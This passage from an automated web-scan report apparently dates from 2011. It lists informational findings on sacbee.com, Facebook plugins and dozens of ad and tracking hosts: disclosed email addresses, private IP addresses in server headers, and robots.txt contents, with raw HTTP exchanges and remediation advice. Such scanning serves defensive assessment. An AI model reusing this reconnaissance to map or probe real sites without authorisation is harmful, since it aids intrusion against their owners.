shaw Christian High School in the Smackdown in Sactown Football Classic at Grant High School, Friday Sept 2, 2011.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Brian Baer/sabeephotos@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cdescription\u003eResults are coming in to our updating scoreboard page. See scores from Smackdown in Sactown and the other local action.
...[SNIP]...
media.sacbee.com/smedia/2011/09/02/23/33/16Mm8c.Hi.4.jpg\" height\u003d\"121\" width\u003d\"180\" border\u003d\"0\"/\u0026gt;\u0026lt;/a\u0026gt; \u0026lt;br/\u0026gt; Jos\u0026amp;#xE9; Luis Villegas jvillegas@sacbee.com Highlands quarterback Kurtis Stamm is sacked by defenders from Leland of San Jose in the second quarter of their Battle at the Capital game at Del Oro High School in Loomis. The game was still in prog
...[SNIP]...
ouse at the Thunderbird Lodge Historic Site. The 55 foot commuter yacht was launched July 14th 1940. May 29, 2010]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Autumn Cruz/acruz@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/08/31/18/03/15VAsp.St.4.jpg\" height\u003d\"476\" width\u003d\"640\" type\u
...[SNIP]...
lthy George Whittell in 1936 on the east shore of Lake Tahoe. Tours are now available to the public. May 29, 2010]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Autumn Cruz/acruz@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Associated Press\u003c/sb:credit\u003e\u003cdescription\u003eThe pilot who safely landed a disabled airliner in New Y
...[SNIP]...
estigators want to move the car to a spot where they can closely examine it and may also conduct more interviews.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[RANDY PENCH/rpench@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eLincoln fire and police officials credit the quick work of
...[SNIP]...
oad Administration investigators want to move the car to a spot where they can closely examine it and may also conduct more interviews.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003eclocke@sacbee.com (Cathy Locke)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://blogs.sacbee.com/crime/archives/2011/09/lincoln-officia.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003eclocke@sacbee.com (Cathy Locke)\u003c/dc:creator\u003e\u003cdc:date\u003eFri, 02 Sep 2011 17:36:21 PDT\u003c/dc:date\u003e\u003cpubDate\u003eFri, 02 Sep 2011 17:36:21 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003catom:
...[SNIP]...

21.7. http://www.personalcreations.com/CustomerService-ContactUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/CustomerService-ContactUs.aspx

Issue detail

The following email addresses were disclosed in the response:

affiliatesupport@personalcreations.com
pr@providecommerce.com
wecare@customercare.personalcreations.com

Request

GET /CustomerService-ContactUs.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.8. http://www.sacbee.com/notfound/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/notfound/

Issue detail

The following email address was disclosed in the response:

feedback@sacbee.com

Request

Response

22. Private IP addresses disclosed previous next
There are 5 instances of this issue:

/extern/login_status.php
/extern/login_status.php
/plugins/like.php
/plugins/like.php
/plugins/likebox.php

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

22.1. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.160.62

Request

GET /extern/login_status.php?api_key=169549326390879&app_id=169549326390879&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15d33f88%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17c6a8bf%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df829f9104%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df167d67864%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df829f9104&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31fa05874%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df829f9104&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c39a6048%26origin%3Dhttp%253A%252F%252Fwww.reuters.com%252Ff26b97bc4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df829f9104&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.160.62
X-Cnection: close
Date: Sun, 04 Sep 2011 01:01:25 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f31fa05874&origin=http\u00253A\u00252F\u00252Fwww.reuters.com\u00252Ff26b97bc4&relation=parent&transport=postmessage&frame=f829f9104", "http:\/\/
...[SNIP]...

22.2. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.159.52

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.52
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 22

Invalid Application ID

22.3. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.163.51

Request

Response

22.4. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.166.57

Request

Response

22.5. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.143.43

Request

Response

23. Robots.txt file previous next
There are 66 instances of this issue:

http://ad.afy11.net/ad
http://ad.turn.com/server/ads.js
http://ad.yieldmanager.com/pixel
http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62
http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json
http://b.scorecardresearch.com/b
http://c.betrad.com/surly.js
http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62
http://cdn.gigya.com/js/socialize.js
http://cdn.optmd.com/V2/89733/235451/index.html
http://cdn.turn.com/server/ddc.htm
http://ce.lijit.com/merge
http://cim.meebo.com/cim
http://cm.npc-mcclatchy.overture.com/js_1_0/
http://community.sprint.com/baw/index.jspa
http://content.usatoday.com/communities/campusrivalry/topics
http://fonts1.scribdassets.com/static/4gen.css
http://fonts2.scribdassets.com/static/4gen_ie.css
http://fonts4.scribdassets.com/static/4gen.js
http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH
http://get.lingospot.com/arc/stay/
http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp
http://i.casalemedia.com/imp.gif
http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js
http://imp.fetchback.com/serve/fb/adtag.js
http://jlinks.industrybrains.com/jsct
http://l.addthiscdn.com/live/t00/250lo.gif
http://m.xp1.ru4.com/activity
http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s87897360916249
http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794
http://pixel.mathtag.com/sync
http://pixel.quantserve.com/pixel
http://premium.mookie1.com/2/nbc.com/ac@Bottom3
http://r.casalemedia.com/rum
http://r.turn.com/r/beacon
http://rt.legolas-media.com/lgrt
http://s0.2mdn.net/2179194/HYSA_BLACK_RATE_300x250_40k.swf
http://s6.scribdassets.com/aggregated/css/base.css
http://s7.scribdassets.com/aggregated/css/web.css
http://sales.reuters.com/pitches/roughcuts/rc728x90.swf
http://static.lingospot.com/js/all.js
http://sync.mathtag.com/sync
http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee
http://tcr.tynt.com/javascripts/Tracer.js
http://trc.taboolasyndication.com/reuters/trc/2/json
http://turn.nexac.com/r/pu
http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s84327528064604
http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401
http://www.bizographics.com/collect/
http://www.facebook.com/plugins/like.php
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1031221371/
http://www.linkedin.com/analytics/
https://www.linkedin.com/secure/login
http://www.meebo.com/cim/sandbox.php
http://www.personalcreations.com/
http://www.publish2.com/newsgroups/state-worker.js
http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
http://www.sacbee.com/notfound
http://www.scribd.com/embeds/63688924/content
http://www.sprint.com/index_c.html
https://www.sprint.net/performance
http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html
http://www.wunderground.com/auto/sacbee/CA/Sacramento.html
http://www.youtube.com/embed/xXftjfC3b5o

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

23.1. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:56:36 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /

23.2. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 00:55:06 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.3. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:47:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:47:36 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

23.4. http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/10105-135615-9432-62

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 00:53:45 GMT
Connection: keep-alive

User-agent: *
Disallow: /

23.5. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 00:46:53 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23.6. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

23.7. http://c.betrad.com/surly.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/surly.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:55:18 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

23.8. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.casalemedia.com
Path:	/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 27 Sep 2010 18:26:29 GMT
ETag: "14b0194-1a-ddec5f40"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 00:58:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:58:17 GMT
Connection: close

User-agent: *
Disallow: /

23.9. http://cdn.gigya.com/js/socialize.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.gigya.com
Path:	/js/socialize.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:52:13 GMT
Content-Length: 28
Connection: close

User-agent: *
Disallow: /

23.10. http://cdn.optmd.com/V2/89733/235451/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.optmd.com
Path:	/V2/89733/235451/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "d54bba-1a-3fa51a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 00:52:58 GMT
Connection: close

User-agent: *
Disallow: /

23.11. http://cdn.turn.com/server/ddc.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sun, 04 Sep 2011 00:55:27 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.12. http://ce.lijit.com/merge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ce.lijit.com
Path:	/merge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:09 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n15 ( lax-agg-n38), ht-d lax-agg-n38.panthercdn.com
ETag: "5b80d5-17a-4aacf20bc34c0"
Cache-Control: max-age=604800
Expires: Wed, 07 Sep 2011 12:18:02 GMT
Age: 304807
Content-Length: 378
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 18 Aug 2011 22:28:11 GMT
Connection: close

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.13. http://cim.meebo.com/cim previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cim.meebo.com
Path:	/cim

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:08:38 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Tue, 09 Aug 2011 21:34:11 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/

23.14. http://cm.npc-mcclatchy.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

23.15. http://community.sprint.com/baw/index.jspa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/index.jspa

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: community.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:45 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 01 Jul 2011 15:05:49 GMT
ETag: "2f1066-52-4a7035a536d40"
Accept-Ranges: bytes
Content-Length: 82
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /baw/people/
Disallow: /baw/jumpPage.jspa
Crawl-delay: 30

23.16. http://content.usatoday.com/communities/campusrivalry/topics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/topics

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:42 GMT
Accept-Ranges: bytes
ETag: "0fbccbb165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

23.17. http://fonts1.scribdassets.com/static/4gen.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fonts1.scribdassets.com
Path:	/static/4gen.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts1.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:01:49 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n42 ( lax-agg-n58), ht-d lax-agg-n58.panthercdn.com
ETag: "9152d7f1724ed8fbcd2e0c87029f193c"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 10:19:56 GMT
Age: 139313
Content-Length: 25
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Sat, 10 Jul 2010 23:55:04 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow: /

23.18. http://fonts2.scribdassets.com/static/4gen_ie.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fonts2.scribdassets.com
Path:	/static/4gen_ie.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts2.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:19:21 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n31 ( lax-agg-n58), ht-d lax-agg-n58.panthercdn.com
ETag: "9152d7f1724ed8fbcd2e0c87029f193c"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 10:19:56 GMT
Age: 140365
Content-Length: 25
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Sat, 10 Jul 2010 23:55:04 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow: /

23.19. http://fonts4.scribdassets.com/static/4gen.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fonts4.scribdassets.com
Path:	/static/4gen.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts4.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:32 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n38 ( lax-agg-n58), ht lax-agg-n58.panthercdn.com
ETag: "9152d7f1724ed8fbcd2e0c87029f193c"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 10:19:56 GMT
Age: 139356
Content-Length: 25
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Sat, 10 Jul 2010 23:55:04 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow: /

23.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

23.21. http://get.lingospot.com/arc/stay/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://get.lingospot.com
Path:	/arc/stay/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: get.lingospot.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1124621243"
Last-Modified: Mon, 18 Jun 2007 02:58:32 GMT
Content-Length: 27
Date: Sun, 04 Sep 2011 01:08:26 GMT
Server: lingo

User-agent: *
Disallow: /

23.22. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://html2.scribdassets.com
Path:	/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: html2.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:09:47 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n17 ( lax-agg-n58), ht-d lax-agg-n58.panthercdn.com
ETag: "9152d7f1724ed8fbcd2e0c87029f193c"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 10:19:56 GMT
Age: 139791
Content-Length: 25
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Sat, 10 Jul 2010 23:55:04 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow: /

23.23. http://i.casalemedia.com/imp.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.casalemedia.com
Path:	/imp.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 00:53:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:07 GMT
Connection: close

User-agent: *
Disallow: /

23.24. http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img-cdn.mediaplex.com
Path:	/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=ISO-8859-1
